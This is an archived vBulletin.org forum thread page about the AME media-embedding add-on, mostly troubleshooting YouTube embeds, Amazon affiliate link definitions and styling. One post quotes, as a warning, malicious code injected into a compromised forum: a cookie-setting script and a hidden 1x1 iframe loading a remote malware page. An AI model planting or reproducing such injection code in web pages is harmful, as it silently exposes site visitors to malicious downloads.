vb.org Archive
Page 36 of 43 « First 263435 36 3738 Last »
Show 40 post(s) from this thread on one page

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vBulletin 3.8 Add-ons (https://vborg.vbsupport.ru/forumdisplay.php?f=235)
-   -   Major Additions - AME 2.5 - Media Embedding for posts, sigs, vm's, groups and blogs (https://vborg.vbsupport.ru/showthread.php?t=202476)

ShackMaster 10-30-2010 02:39 PM
BEWARE OF THIS PLUGIN! We believe we had a vulnerability using the AME (Auto Media Embedder) product/plugin and have removed the plugin. We are actually certain this was the culprit now that it has been removed and the malicious code is no longer a problem. Here is the malicious code it was injecting:

Code:
<script> function SetCookie(cookieName,cookieContent){ var cookiePath =
'/'; var expDate=new Date();
expDate.setTime(expDate.getTime()+372800000) ; var
expires=expDate.toGMTString();
document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires;
} SetCookie("hsmsdn", "turk"); </script> <iframe
name="1" width="1" height="1"
scrolling="no" frameborder="no" marginwidth="0"
marginheight="0"
src="http://www.chekolkal.co.cc/felk.php"></iframe>

Of course we got several warnings from Google who was blocking some of our pages due to the malicious code.

We tried to convert the AME code back to normal URL's prior to removing the product, but it would not work. We have removed it, but now those posts have the [ame] tags wrapped around a media link and we would like to remove them and not have to do it manually.

Is there an SQL query we can run that will remove all instances of [ame] and [/ame]?

Thanks!

creativepart 10-30-2010 08:39 PM
Looks sort of like the VBSEO injection exploit that simply placed the malicious code in the first Mod in your list and AME would generally be one of the first. That's what the exploit does -- it puts a base64 iframe in a plugin for one of the first mods on your mod list.

On my forum it placed the malware code in an All-Advertising mod plugin -- but it wasn't the mods fault.

Are you running VBSEO and have you upgraded the files to prevent the exploit?

creativepart 10-30-2010 08:47 PM
I recently ran a "rebuild post cache" maintenance routine and it disabled most if not all old YouTube vid links in AME. If I click on the post's edit button and then save it puts the vid back in the post. Otherwise it's just missing.

I know there are some tools, but I'm not sure which one to run to re-apply the mod to my existing posts. And, the warnings there kind of scared me off just giving it a try to see what happens.

Could you scale that learning curve for me and let me know which tool to use and how to apply it?

PS. I'm using VB 3,7.3 and AME 2.5.6 and the stock YouTube definition and nothing else.

carsafety 10-30-2010 09:58 PM
Hi-

Does anyone have a working Amazon affiliate definition? Amazon must have changed their format a while back, as my previous definition seems hit or miss lately. Thanks!

BirdOPrey5 10-30-2010 11:24 PM
I'm using this but it's pretty standard I think.

Regular Expression:
Code:
http://www\.amazon\.[a-z\.]*/[\w%-]*/[\w]+/([\w]+).*
Replacement:

Code:
<a href="$ameinfo[url]?tag=joesultofftop-20" target="_blank" title="$ameinfo[url]"><img src="images/misc/amazon_icon.gif" border="0" alt="$ameinfo[title]" />$ameinfo[title]</a>
Replace my affiliate code (in red) with your own.

ShackMaster 10-31-2010 12:37 AM
Quote:
Originally Posted by creativepart (Post 2116159)
Looks sort of like the VBSEO injection exploit that simply placed the malicious code in the first Mod in your list and AME would generally be one of the first. That's what the exploit does -- it puts a base64 iframe in a plugin for one of the first mods on your mod list.

On my forum it placed the malware code in an All-Advertising mod plugin -- but it wasn't the mods fault.

Are you running VBSEO and have you upgraded the files to prevent the exploit?
We do have one plugin ahead of where AME would be, but it is an Admin plugin, so there may have not been access available.

Yes... we have updated vBSEO to the latest version... immediately after we first got hit.

Will it now move to the next plugin on the list? Any idea what we need to install to block it?

carsafety 10-31-2010 02:13 PM
Quote:
Originally Posted by BirdOPrey5 (Post 2116214)
I'm using this but it's pretty standard I think.
Yeah it looks like that's the same one I have, but it seems to fail far more often than in the past and I haven't figured out why yet. I guess I need to take some time to look at Amazon links and understand how the replacement definitions work. Granted, I've been meaning to do that for most of the year and was hoping someone had done the work for me lol.

Thanks for taking the time to post what you had though I greatly appreciate it!

ShackMaster 11-01-2010 02:01 PM
Quote:
Originally Posted by creativepart (Post 2116159)
Looks sort of like the VBSEO injection exploit that simply placed the malicious code in the first Mod in your list and AME would generally be one of the first. That's what the exploit does -- it puts a base64 iframe in a plugin for one of the first mods on your mod list.

On my forum it placed the malware code in an All-Advertising mod plugin -- but it wasn't the mods fault.

Are you running VBSEO and have you upgraded the files to prevent the exploit?
I opened a ticket with vBulletin and here is their response:

We're not aware of any vulnerability within vBulletin 3.8.6 for this however any issue with a plugin will relate specifically to their code. vBulletin just gives the code a 'hook' to attach to and allow it to run during a particular process - we do nothing specifically with a plugin's code.

Exactly what I suspected... neither party wants to accept responsibility or apparently even investigate if they have an security issue.

legatw 11-04-2010 03:50 PM
This modification increases the load on the server?

BirdOPrey5 11-04-2010 03:53 PM
All mods increase the load on the server but in the scheme of things not all that much.

legatw 11-04-2010 04:15 PM
on forum add a lot of youtube videos is to use this mod, or make better use of bbсode?

BirdOPrey5 11-04-2010 07:10 PM
I couldn't imagine there would be much of a difference between this mod and a bb code- both are using search and replace algorithms.

legatw 11-04-2010 07:52 PM
BirdOPrey5, thanks

thompson 11-05-2010 01:58 PM
does this work with 4.08 ?

BirdOPrey5 11-05-2010 02:51 PM
No, there was a 4.0 version released by someone else but I think I read it stopped working several 4.0.x versions back.

thompson 11-05-2010 03:35 PM
thanks. this is not good for me. :-(

Black Tiger 11-05-2010 04:58 PM
Can you help me too please?

I've got a problem with youtube.
I suddenly only see an icon with the link behind it, but film won't embed.

When I try to embed this link for example:
http://www.youtube.com/watch?v=dGtk1dHLSKM

It will look like:
[icon here] YouTube - Johnny Winter playing Red House in 1991

When I put my mouse over it, it says:
External Embedding not Available.

How can I fix this? I already tried reinstalling the product and also deleting all definitions and importing new ones.
And the Validation Regex box is empty!
When I disable extraction globally and edit/save a post, the video's become embedded double with some strange text between them. When enabling extracting globally, only icons with links remain. This goes for ALL youtube video's.

I'm using VBulletin 3.8.5. and Ame 2.5.

This question is also in the DJ's AME definitions thread, but I think it should be here in this thread, correct?

MjrNuT 11-09-2010 02:43 PM
My own question regarding self hosted video (i.e., wmv) on what folks may be doing here in conjunction with AME.

Currently, I have a /videos directory for which I upload such files. Then use the AME internal linking to present. Recommendations on implementing access to non-admins? Just create an FTP account for that folder only? Is there a hack (e.g., downloadsII) that could be mated in combination for a non-admin (general ugroup)?

Thanks for any ideas, recommendations, and direction!

IRANCITY 11-20-2010 01:48 PM
sry when it come for vb 4.0.8 ?

y2krazy 11-24-2010 01:17 PM
1 Attachment(s)
Is there a way to "cutoff" the container title text after, let's say 50 characters?

If it is longer than 60 characters on my style, it goes to a 2nd line and due to my images used, they are not multiple line friendly. Please let me know if there's a way to "cutoff" text and add something like "..." to the end to show there is more to the title. Thanks!

EDIT: Examples attached. One with a "normal" title. One with a "2-line" title.

nektar 11-25-2010 07:25 AM
Hi everyone.

I'm having a javascript error in internet explorer 8 at this line.

PHP Code:
<!-- / icons and login code -->

<script type="text/javascript">ame_toggle_view({,other 'true',post 'true',blog 'true',group 'true',vm 'true',sig 'true'});</script
The product works fine but I hate to see javascript errors in explorer status bar.

Are you guys having the same problem? I'm running 3.8.5 and the latest ame 2.5.6

Edit:

If I disable this plugin the error goes away.

PHP Code:
AME Permission  Hide 
Does anyone know what this plugin does?

BirdOPrey5 11-25-2010 12:05 PM
I'm pretty sure that plugin "Hides" (or disables) AME for usergroups who aren't allowed to use it- if for some reason you disabled it for some users. I know one site for example where they disable it for guests.

BirdOPrey5 11-29-2010 11:17 PM
I wonder if it would be possible to make a definition that would work for any web site and pull the "title" of the site and put it as the link, so instead of:
https://vborg.vbsupport.ru/index.php
you'd get
vBulletin.org Forum

Otherwise is there some way to make this work nicely with this existing mod?
https://vborg.vbsupport.ru/showthread.php?t=189658

It works but the titles on youtube videos become full URL's instead of titles with both mods enabled.

carsafety 12-01-2010 11:46 PM
Quote:
Originally Posted by BirdOPrey5 (Post 2116214)
I'm using this but it's pretty standard I think.

Regular Expression:
Code:
http://www\.amazon\.[a-z\.]*/[\w%-]*/[\w]+/([\w]+).*
Replacement:

Code:
<a href="$ameinfo[url]?tag=joesultofftop-20" target="_blank" title="$ameinfo[url]"><img src="images/misc/amazon_icon.gif" border="0" alt="$ameinfo[title]" />$ameinfo[title]</a>
Replace my affiliate code (in red) with your own.
Okay I think I have found the problem. If you take a shortened Amazon link, like those you get from a Google search, it works just fine. The syntax is usually http://www.amazon.com/product-name-here/dp/JDISHIOEHO and AME turns it into http://www.amazon.com/product-name-h...filiatecode-20 . This validates using Amazon link checker just fine.

The problem arises if you use a longer Amazon link, like the ones you get when you search for an item at Amazon.com. These URLs already have a question mark in them, like ?ie=UTF8&blahblah . If you copy that, the AME appends ?tag=youraffilaitecode-20 to the end of the URL. This will not validate using the Amazon link checker, presumably because two question marks appear in the URL.

You can make it validate by appending &tag=youraffiliatecode-20 to the end of the URL instead. The problem is this syntax will not validate with the shorter URL format you might copy off Google.

All is fine if you are the only one putting Amazon links on your forum, but of course you want it to automatically append the right tag for whatever type of Amazon link a user might post.

Anyone handy with definitions have an idea on how to use ?tag= for shorter Amazon links and &tag= for the longer types that have a ? in the URL already? Maybe two separate ones?

One possible idea is that you append this to the end of any url ?tag=youraffiliatecode-20&tag=youraffiliatecode-20 . This seems like it works in limited testing, but I'm not all that familiar with AME definitions and Amazon URL formats to say for sure. Sometimes redundancy is good, sometimes it is not...

BirdOPrey5 12-02-2010 12:48 AM
If what you say is true I would make the replacement link always have an ?= even if it's a dummy value it should just be ignored, ?dummy=5... then the &tag=affiliatecode should always work. I don't know if this would pass the amazon link checker but it should work in practice.

Digital Jedi 12-02-2010 08:08 PM
A number of these previous questions, which I would specify if I had a little more time today, are somewhat rectified if you use the up-to-date definitions in the add-on thread. The default definitions for AME have not been valid or updated in quite some time. I try my best to keep mine up to date, even though that tough in all cases.

Digital Jedi 12-02-2010 08:10 PM
Quote:
Originally Posted by legatw (Post 2117945)
on forum add a lot of youtube videos is to use this mod, or make better use of bbсode?
Quote:
Originally Posted by BirdOPrey5 (Post 2118014)
I couldn't imagine there would be much of a difference between this mod and a bb code- both are using search and replace algorithms.
I wanted to comment on this one real quick. Actually, yes, there's a big difference. BBCode uses more resources when a page is generated than AME does. This is explained somewhat in the description, but simplistically, this is less server intensive.

carsafety 12-02-2010 11:27 PM
Quote:
Originally Posted by BirdOPrey5 (Post 2128188)
If what you say is true I would make the replacement link always have an ?= even if it's a dummy value it should just be ignored, ?dummy=5... then the &tag=affiliatecode should always work. I don't know if this would pass the amazon link checker but it should work in practice.
From my testing today, the combined tag I posted works best. It validated in every case that I tried, including some links that get passed to the redirected mobile Amazon site on phones. That's not conclusive, but so far, so good.

Quote:
Originally Posted by Digital Jedi (Post 2128533)
A number of these previous questions, which I would specify if I had a little more time today, are somewhat rectified if you use the up-to-date definitions in the add-on thread. The default definitions for AME have not been valid or updated in quite some time. I try my best to keep mine up to date, even though that tough in all cases.
I think the definition BirdOfPrey posted back a page or two was the one from your definitions and it was far superior to the default one if I recall correctly (thanks!). Of course, if you updated it recently, perhaps your most current one solves the issue another way?

lafsunlmtd 12-03-2010 01:26 PM
This worked for me for a while and now has stopped working? I'm using 2.5.6

Edit: I cleared cache and now it works

Digital Jedi 12-03-2010 03:07 PM
Quote:
Originally Posted by carsafety (Post 2128611)
From my testing today, the combined tag I posted works best. It validated in every case that I tried, including some links that get passed to the redirected mobile Amazon site on phones. That's not conclusive, but so far, so good.



I think the definition BirdOfPrey posted back a page or two was the one from your definitions and it was far superior to the default one if I recall correctly (thanks!). Of course, if you updated it recently, perhaps your most current one solves the issue another way?

Any issues with that, please direct towards my thread and I'll try to address them.

Digital Jedi 12-03-2010 03:27 PM
Okay, I'm referring to this post in the AME 3 thread by The Geek. For a while now I've wanted to delve into an existing product to assist in my own personal studies of PHP and vB mod development. But I need a good reason to spend that time on it. I was going to ask The Geek first, but wasn't sure I could get in contact with him now that he's not longer involved in vBulletin coding. But it seems he's left the code open for anyone to try and continue development. To keep AME alive. I wish to do that. I wish to keep AME going for the foreseeable future. So while I can't guarantee a timeline, I am going to try and do my own second generation release of the AME code to try and keep this great product alive. I need to spend some time reviewing the code, understanding the fundamentals. But I intend to try to keep this product from fading away. Don't know if that will include vB4 development, at least not at first, but I will look into. Hope you can bear with me.

Black Tiger 12-03-2010 03:34 PM
I think it's great you want to take it over and keep it alive.

My compliments already!

schlottkej 12-06-2010 02:15 PM
3 cheers for DJ!

dieselpowered 12-07-2010 02:28 AM
Hey everyone, I would like to change the color of the title on the container. What would be the best way to do that? I see it uses the tcat class, however, black on black is a little hard to read, lol. Not sure why it is not taking the text color of the tcat in the css settings?

Thanks in advance!

Digital Jedi 12-07-2010 01:04 PM
Quote:
Originally Posted by dieselpowered (Post 2130296)
Hey everyone, I would like to change the color of the title on the container. What would be the best way to do that? I see it uses the tcat class, however, black on black is a little hard to read, lol. Not sure why it is not taking the text color of the tcat in the css settings?

Thanks in advance!
It should look just like your category headers, but it's possible you have something overriding the text of the div that contains posts. Try adding a style="color:color name/#number" to that table cell in the container template and see if it changes anything.

zeus_r6 12-09-2010 01:10 PM
Is there a way to disable embedding on a specific style?

Digital Jedi 12-09-2010 03:02 PM
Quote:
Originally Posted by zeus_r6 (Post 2131297)
Is there a way to disable embedding on a specific style?
Oh, I see you found it. I recommend not bumping 2.0 thread again. Can cause a few folks to download the wrong version.

Check the add-on for my AME Templates for Mobile Skin. That should do what your wanting.

zeus_r6 12-09-2010 04:41 PM
Thanks so much!

mmllc 12-10-2010 03:45 AM
This doesn't work so swell for me :(

Digital Jedi 12-10-2010 03:55 PM
Quote:
Originally Posted by mmllc (Post 2131726)
This doesn't work so swell for me :(
What seems to be the problem? Remember that the default definitions here don't work anymore. You'd need to get the up to date definitions from my thread.


All times are GMT. The time now is 05:06 PM.
Page 36 of 43 « First 263435 36 3738 Last »
Show 40 post(s) from this thread on one page

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.02803 seconds
  • Memory Usage 1,855KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (5)bbcode_code_printable
  • (2)bbcode_php_printable
  • (12)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (4)pagenav_pagelink
  • (1)pagenav_pagelinkrel
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (40)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • pagenav_page
  • pagenav_complete
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete